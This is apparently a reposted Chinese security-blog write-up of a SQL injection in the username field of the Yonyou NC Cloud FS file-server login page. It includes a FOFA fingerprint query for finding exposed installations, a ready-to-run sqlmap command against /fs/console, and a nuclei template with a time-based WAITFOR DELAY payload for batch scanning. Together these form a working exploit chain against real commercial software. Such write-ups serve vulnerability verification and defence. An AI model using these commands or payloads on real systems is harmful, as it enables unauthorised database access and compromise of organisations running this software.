漏洞描述
用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入。
漏洞影响
用友NC Cloud且存在FS文件服务器配置管理登录页面。
漏洞复现
fofa语法:app="用友-NC-Cloud" && icon_hash="1596996317"
用友NC Cloud登录页面如下:
在应用中存在文件服务器管理登录页面
http://xxx.xxx.xxx.xxx/fs/
拦截文件服务器页面的登录请求数据包,然后直接sqlmap梭哈。
sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username
nuclei批量yaml文件
id: yonyou_NCCloud_FS_sqli
info:
name: 用友 NCCloud FS文件管理SQL注入
author: mczilong
severity: critical
tags: yonyou
description: fofa "NCCloud"
requests:
- raw:
- |
@timeout: 15s
GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=8'
标签:文件,FS,NC,用友,SQL,Cloud
From: https://www.cnblogs.com/pursue-security/p/17685151.html